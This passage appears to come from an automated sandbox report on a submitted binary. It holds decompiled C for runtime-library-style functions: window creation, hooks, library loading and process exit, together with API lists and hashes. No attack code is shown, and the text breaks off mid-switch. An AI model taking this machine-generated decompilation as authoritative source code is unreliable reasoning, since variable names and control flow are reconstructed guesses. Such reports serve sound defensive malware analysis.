				if(_t23 != 0) {
					 *((intOrPtr*)(_t33 - 4)) = 0;
					_t24 = CreateWindowExA( *(_t33 + 8),  *(_t33 + 0xc),  *(_t33 + 0x10),  *(_t33 + 0x14),  *(_t33 + 0x18),  *(_t33 + 0x1c),  *(_t33 + 0x20),  *(_t33 + 0x24),  *(_t33 + 0x28),  *(_t33 + 0x2c),  *(_t33 + 0x30),  *(_t33 + 0x34)); // executed
					 *(_t33 - 0x1c) = _t24;
					 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
					E009AB625();
					_t26 =  *(_t33 - 0x1c);
				} else {
					_t26 = 0;
				}
				return E00AAD385(_t26);
			}










      0x009ab5af
      0x009ab5b6
      0x009ab5bd
      0x009ab5c4
      0x009ab5cf
      0x009ab5d5
      0x009ab5da
      0x009ab5e0
      0x009ab607
      0x009ab60d
      0x009ab610
      0x009ab617
      0x009ab61c
      0x009ab5dc
      0x009ab5dc
      0x009ab5dc
      0x009ab624

      APIs
      • ActivateActCtx.KERNEL32(?,?,00B0BAB0,00000010), ref: 009AB5CF
      • CreateWindowExA.USER32 ref: 009AB607
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ActivateCreateWindow
      • String ID:
      • API String ID: 2169890993-0
      • Opcode ID: da3c8604e3aaf8819b944acfe85d906a696595707dc3ae95077930c1efeda4d8
      • Instruction ID: c893e6dd54845434655271c059de19061985c7fd9408d149fb335ba068ef919d
      • Opcode Fuzzy Hash: da3c8604e3aaf8819b944acfe85d906a696595707dc3ae95077930c1efeda4d8
      • Instruction Fuzzy Hash: 3B01C072801219AFCF12AFE0CE059DD7F72BF0C750F008515FA15A6161C7368561AF90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AAC8B2 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
      Download Yara Rule
      C-Code - Quality: 89%
      			E00AAC8B2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t20;
				signed int _t22;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;

				_push(0xc);
				_push(0xb193f8);
				E00AAD340(__ebx, __edi, __esi);
				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t35 = _t32;
				_t36 = _t35 != 0;
				if(_t35 != 0) {
					__eflags =  *(_t32 + 0xc) & 0x00000040;
					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
						E00AAC094(_t32);
						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
						_t20 = E00AAC845(__ebx, __edx, _t32); // executed
						 *(_t33 - 0x1c) = _t20;
						 *(_t33 - 4) = 0xfffffffe;
						E00AAC91E(_t32);
					} else {
						_t9 = _t32 + 0xc;
						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
						__eflags =  *_t9;
					}
					_t22 =  *(_t33 - 0x1c);
				} else {
					 *((intOrPtr*)(E00AADB06(_t36))) = 0x16;
					_t22 = E00AB4B8D() | 0xffffffff;
				}
				return E00AAD385(_t22);
			}








      0x00aac8b2
      0x00aac8b4
      0x00aac8b9
      0x00aac8be
      0x00aac8c4
      0x00aac8c7
      0x00aac8cc
      0x00aac8ce
      0x00aac8e5
      0x00aac8e9
      0x00aac8f9
      0x00aac8ff
      0x00aac904
      0x00aac90a
      0x00aac90d
      0x00aac914
      0x00aac8eb
      0x00aac8eb
      0x00aac8eb
      0x00aac8eb
      0x00aac8eb
      0x00aac8ef
      0x00aac8d0
      0x00aac8d5
      0x00aac8e0
      0x00aac8e0
      0x00aac8f7

      APIs
        • Part of subcall function 00AADB06: __getptd_noexit.LIBCMT ref: 00AADB06
      • __lock_file.LIBCMT ref: 00AAC8F9
        • Part of subcall function 00AAC094: __lock.LIBCMT ref: 00AAC0B9
      • __fclose_nolock.LIBCMT ref: 00AAC904
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
      • String ID:
      • API String ID: 2800547568-0
      • Opcode ID: 53d10308c84e7d29fdb5c9e9921b91b518cdde3cba8e675dc54807008f7a2245
      • Instruction ID: 0bb3a6086b1480df75e9e4ba3e53c4d6f7ff8c11340c3e2e2fe24659a137d760
      • Opcode Fuzzy Hash: 53d10308c84e7d29fdb5c9e9921b91b518cdde3cba8e675dc54807008f7a2245
      • Instruction Fuzzy Hash: 08F0BB30801715DAEB20AB74C90679E7BA06F07334F108244A575EB0D1C77C89019BA6
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AED3F Relevance: 3.0, APIs: 2, Instructions: 32threadCOMMON
      Download Yara Rule
      C-Code - Quality: 91%
      			E009AED3F(void* __ebx, void* __eflags, intOrPtr _a4) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HHOOK__* _t6;
				void* _t10;
				intOrPtr _t11;
				void* _t12;
				struct HHOOK__* _t13;

				_push(E009AB424);
				_t6 = E009BCDBD(__ebx, 0xd0fd04, _t10, _t12, __eflags);
				_t13 = _t6;
				if(_t13 == 0) {
					_t6 = E009B8782(0xd0fd04);
				}
				_t11 = _a4;
				if( *((intOrPtr*)(_t13 + 0x14)) == _t11) {
					return _t6;
				} else {
					if( *(_t13 + 0x28) == 0) {
						_t6 = SetWindowsHookExA(5, E009AEAF8, 0, GetCurrentThreadId()); // executed
						 *(_t13 + 0x28) = _t6;
						if(_t6 == 0) {
							_t6 = E009B874A(0xd0fd04);
						}
					}
					 *((intOrPtr*)(_t13 + 0x14)) = _t11;
					return _t6;
				}
			}











      0x009aed46
      0x009aed50
      0x009aed55
      0x009aed59
      0x009aed5b
      0x009aed5b
      0x009aed60
      0x009aed66
      0x009aed96
      0x009aed68
      0x009aed6c
      0x009aed7e
      0x009aed84
      0x009aed89
      0x009aed8b
      0x009aed8b
      0x009aed89
      0x009aed90
      0x00000000
      0x009aed90

      APIs
        • Part of subcall function 009BCDBD: __EH_prolog3.LIBCMT ref: 009BCDC4
      • GetCurrentThreadId.KERNEL32 ref: 009AED6E
      • SetWindowsHookExA.USER32 ref: 009AED7E
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CurrentException@8H_prolog3HookThreadThrowWindows
      • String ID:
      • API String ID: 1226552664-0
      • Opcode ID: eb92dcd58b410441113a921fb02cdbc8f3a4770f0974ca416a14dba0ea836b02
      • Instruction ID: df3c05215550a13f32b58d94cd7fe15dc72aaf106a156d88aa596f759f600f12
      • Opcode Fuzzy Hash: eb92dcd58b410441113a921fb02cdbc8f3a4770f0974ca416a14dba0ea836b02
      • Instruction Fuzzy Hash: DAF0A035641701ABC730AB96AC15B5F7AACDBC6B76F14053AF6058AA81CF70D841C6F1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AA646 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009AA646(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
				_Unknown_base(*)()* _t11;
				long _t12;
				intOrPtr* _t17;

				_t17 = __ecx;
				_t11 =  *(__ecx + 0x5c);
				if(_t11 != 0) {
					L3:
					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
					return _t12;
				}
				_t11 =  *( *((intOrPtr*)( *__ecx + 0xfc))());
				if(_t11 != 0) {
					goto L3;
				}
				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
			}






      0x009aa64c
      0x009aa64e
      0x009aa653
      0x009aa677
      0x009aa684
      0x00000000
      0x009aa684
      0x009aa65d
      0x009aa661
      0x00000000
      0x00000000
      0x00000000

      APIs
      • DefWindowProcA.USER32(?,?,?,?), ref: 009AA66F
      • CallWindowProcA.USER32 ref: 009AA684
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ProcWindow$Call
      • String ID:
      • API String ID: 2316559721-0
      • Opcode ID: 6b87cdf9ba8c07465e608679a25e522fe017634e4675bae455e357c22a681dc6
      • Instruction ID: 2723b045e84b40a33f0b716a0b5024abcbb7a4b341726088ad839cdf926008b7
      • Opcode Fuzzy Hash: 6b87cdf9ba8c07465e608679a25e522fe017634e4675bae455e357c22a681dc6
      • Instruction Fuzzy Hash: 2EF01C36100209FFCF118FA5DC08DAA7BB9FF19350B088429F94A86530D732D820EF90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AB76B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
      Download Yara Rule
      C-Code - Quality: 79%
      			E009AB76B(void* __ecx, void* __esi, void* __eflags) {
				void* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				void* _t17;
				void* _t19;
				void* _t22;
				void* _t23;

				_t23 = __eflags;
				E00AAD340(_t17, _t19, __esi);
				 *((intOrPtr*)(_t22 - 0x20)) = 0;
				_t12 = E009BD77F(_t17, _t19, 0, _t23);
				__imp__ActivateActCtx( *((intOrPtr*)(_t12 + 0x80)), _t22 - 0x20, 0xb0bb10, 0x10);
				 *(_t22 - 0x1c) = 0;
				if(_t12 != 0) {
					 *((intOrPtr*)(_t22 - 4)) = 0;
					_t13 = LoadLibraryW( *(_t22 + 8)); // executed
					 *(_t22 - 0x1c) = _t13;
					 *((intOrPtr*)(_t22 - 4)) = 0xfffffffe;
					E009AB7C0();
					_t15 =  *(_t22 - 0x1c);
				} else {
					_t15 = 0;
				}
				return E00AAD385(_t15);
			}










      0x009ab76b
      0x009ab772
      0x009ab779
      0x009ab780
      0x009ab78b
      0x009ab791
      0x009ab796
      0x009ab79c
      0x009ab7a2
      0x009ab7a8
      0x009ab7ab
      0x009ab7b2
      0x009ab7b7
      0x009ab798
      0x009ab798
      0x009ab798
      0x009ab7bf

      APIs
      • ActivateActCtx.KERNEL32(?,?,00B0BB10,00000010), ref: 009AB78B
      • LoadLibraryW.KERNELBASE(?), ref: 009AB7A2
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ActivateLibraryLoad
      • String ID:
      • API String ID: 389599620-0
      • Opcode ID: 0cd6115a8bee039e285df807a0b8a81187a856d69aa90b168b9fdc9c07e966c8
      • Instruction ID: 7ff5f418e7495208563de1c45953721b5a5b0620109f065693b883075fb9e125
      • Opcode Fuzzy Hash: 0cd6115a8bee039e285df807a0b8a81187a856d69aa90b168b9fdc9c07e966c8
      • Instruction Fuzzy Hash: 0BF01CB4D112189BCF10AFB0CE45A9DBBB4FF49710F504965E056E65A2C77445029FD0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B30E9 Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
      Download Yara Rule
      C-Code - Quality: 86%
      			E009B30E9(void* __esi, void* __eflags) {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;
				void* _t7;
				void* _t8;

				_t3 = E009BD77F(_t7, _t8, __esi, __eflags);
				_t13 =  *((char*)(_t3 + 0x14));
				if( *((char*)(_t3 + 0x14)) == 0) {
					_push(__esi);
					_t4 = E009BD1B0(_t7, _t8, __esi, _t13);
					_t6 = SetWindowsHookExA(0xffffffff, E009B2F4E, 0, GetCurrentThreadId()); // executed
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}








      0x009b30e9
      0x009b30ee
      0x009b30f2
      0x009b30f4
      0x009b30f5
      0x009b310c
      0x009b3112
      0x00000000
      0x009b3115
      0x009b3116

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CurrentHookThreadWindows
      • String ID:
      • API String ID: 1904029216-0
      • Opcode ID: 0ca769c6ba9af3b43792265ca7fc793abf63da66c17e1d4fe51e16891fa9a411
      • Instruction ID: 62c93bf890bc503217407a898861e74c51a616339361748ff5b60e1da356747f
      • Opcode Fuzzy Hash: 0ca769c6ba9af3b43792265ca7fc793abf63da66c17e1d4fe51e16891fa9a411
      • Instruction Fuzzy Hash: 5FD0A77180F2502ED720ABB46E09BD93B988B41330F040345F421551D2DA60854247D1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AAC984 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 100%
      			E00AAC984(int _a4) {

				E00AAC959(_a4);
				ExitProcess(_a4);
			}



      0x00aac98c
      0x00aac995

      APIs
      • ___crtCorExitProcess.LIBCMT ref: 00AAC98C
        • Part of subcall function 00AAC959: GetModuleHandleW.KERNEL32(mscoree.dll,?,00AAC991,00000000,?,00AACFCA,000000FF,0000001E,00000001,00000000,00000000,?,00AB4D5B,00000000,00000001,00000000), ref: 00AAC963
        • Part of subcall function 00AAC959: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AAC973
      • ExitProcess.KERNEL32 ref: 00AAC995
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ExitProcess$AddressHandleModuleProc___crt
      • String ID:
      • API String ID: 2427264223-0
      • Opcode ID: 2504e58169eb95bffe8b523c26ef28f6b13e2f323837a54ec90fe1fab618cb3f
      • Instruction ID: 38116b1b45d8bd0068efbc6a3a4ccbe04b7271e72f6415e7332fec50890969bd
      • Opcode Fuzzy Hash: 2504e58169eb95bffe8b523c26ef28f6b13e2f323837a54ec90fe1fab618cb3f
      • Instruction Fuzzy Hash: 67B0923100010DBFEB012F52ED0A88A3F2AEB893A0B154025F8090A071DF72AD939AC0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AEEF6 Relevance: 1.8, APIs: 1, Instructions: 285COMMON
      Download Yara Rule
      C-Code - Quality: 38%
      			E009AEEF6(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t156;
				signed int _t158;
				signed int* _t161;
				intOrPtr _t168;
				intOrPtr* _t169;
				signed int _t172;
				signed int _t175;
				signed int* _t179;
				signed int* _t182;
				signed int _t186;
				signed int _t190;
				signed int _t194;
				signed int _t198;
				signed int* _t203;
				signed int _t204;
				signed int _t205;
				intOrPtr* _t206;
				signed int _t207;
				signed int _t222;
				signed int _t226;
				void* _t228;
				unsigned int _t234;
				void* _t235;

				_t209 = __ecx;
				_push(0x90);
				E00AAD232(0xac8101, __ebx, __edi, __esi);
				_t232 = __ecx;
				 *((intOrPtr*)(_t235 - 0x10)) = 0;
				 *((intOrPtr*)(_t235 - 0x14)) = 0x7fffffff;
				_t198 =  *(_t235 + 8);
				 *(_t235 - 4) = 0;
				if(_t198 != 0x111) {
					__eflags = _t198 - 0x4e;
					if(_t198 != 0x4e) {
						_t234 =  *(_t235 + 0x10);
						__eflags = _t198 - 6;
						if(_t198 == 6) {
							E009AE8A1(_t209, _t232,  *((intOrPtr*)(_t235 + 0xc)), E009AC90B(_t198, __ecx, _t228, _t234));
						}
						__eflags = _t198 - 0x20;
						if(_t198 != 0x20) {
							L12:
							_t156 =  *(_t232 + 0x68);
							__eflags = _t156;
							if(_t156 == 0) {
								L20:
								_t158 =  *((intOrPtr*)( *_t232 + 0x28))();
								 *(_t235 + 0x10) = _t158;
								E009AB812(_t235 - 0x14, _t234, 7);
								_t203 = 0xd0e150 + ((_t158 ^  *(_t235 + 8)) & 0x000001ff) * 0xc;
								 *(_t235 - 0x18) = _t203;
								__eflags =  *(_t235 + 8) -  *_t203;
								if( *(_t235 + 8) !=  *_t203) {
									L25:
									_t161 =  *(_t235 - 0x18);
									_t204 =  *(_t235 + 0x10);
									 *_t161 =  *(_t235 + 8);
									_t161[2] = _t204;
									while(1) {
										__eflags =  *_t204;
										if( *_t204 == 0) {
											break;
										}
										__eflags =  *(_t235 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t235 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t235 + 0x10) + 4)));
											while(1) {
												_t205 = E009AA764();
												__eflags = _t205;
												if(_t205 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t235 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t235 + 8)) {
													( *(_t235 - 0x18))[1] = _t205;
													E009AB846(_t235 - 0x14);
													L113:
													_t206 =  *((intOrPtr*)(_t205 + 0x14));
													L114:
													_push(_t234);
													L115:
													_push( *((intOrPtr*)(_t235 + 0xc)));
													L116:
													_t168 =  *_t206();
													L117:
													 *((intOrPtr*)(_t235 - 0x10)) = _t168;
													goto L118;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t207 = _t205 + 0x18;
												__eflags = _t207;
												_push(_t207);
											}
											_t204 =  *(_t235 + 0x10);
											L36:
											_t204 =  *_t204();
											 *(_t235 + 0x10) = _t204;
											continue;
										}
										_push( *(_t235 + 8));
										_push( *((intOrPtr*)(_t204 + 4)));
										_t175 = E009AA764();
										 *(_t235 + 0x10) = _t175;
										__eflags = _t175;
										if(_t175 == 0) {
											goto L36;
										}
										( *(_t235 - 0x18))[1] = _t175;
										E009AB846(_t235 - 0x14);
										L29:
										_t222 =  *((intOrPtr*)( *(_t235 + 0x10) + 0x10)) - 1;
										__eflags = _t222 - 0x53;
										if(__eflags > 0) {
											goto L118;
										}
										switch( *((intOrPtr*)(_t222 * 4 +  &M009AF4C6))) {
											case 0:
												_push(E009BAD30(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc));
												goto L50;
											case 3:
												_push(__esi);
												__eax = E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi; // executed
												__eax =  *__ebx(); // executed
												goto L117;
											case 5:
												__ecx = __ebp - 0x28;
												E009BA639(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x9c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E009AB862(__ecx, __edx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x7c) = __eax;
												__eax = E009AC937(__ebx, __ecx, __edx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x68);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x24;
														__eax = E009C2BBF(__eax + 0x24, __edx,  *(__ebp - 0x7c));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x30) = __eax;
														}
													}
													__eax = __ebp - 0x9c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												_t84 = __ebp - 0x7c;
												 *_t84 =  *(__ebp - 0x7c) & 0x00000000;
												__eflags =  *_t84;
												__ecx = __ebp - 0x9c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E009AD6CC(__ebx, __ebp - 0x9c, __edx, __edi, __esi,  *_t84);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E009BA639(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E009BADC5(__ecx);
												goto L118;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E009AC90B(__ebx, __ecx, __edx, __esi);
												goto L62;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L114;
											case 0xa:
												_push(E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags, __esi));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L62:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L50:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0xb:
												_push(__esi);
												goto L110;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L66;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L69;
											case 0xf:
												_push(__esi >> 0x10);
												__eax = __si;
												goto L69;
											case 0x10:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x11:
												__eax = E009AC90B(__ebx, __ecx, __edx, __esi);
												goto L48;
											case 0x12:
												__ecx = __edi;
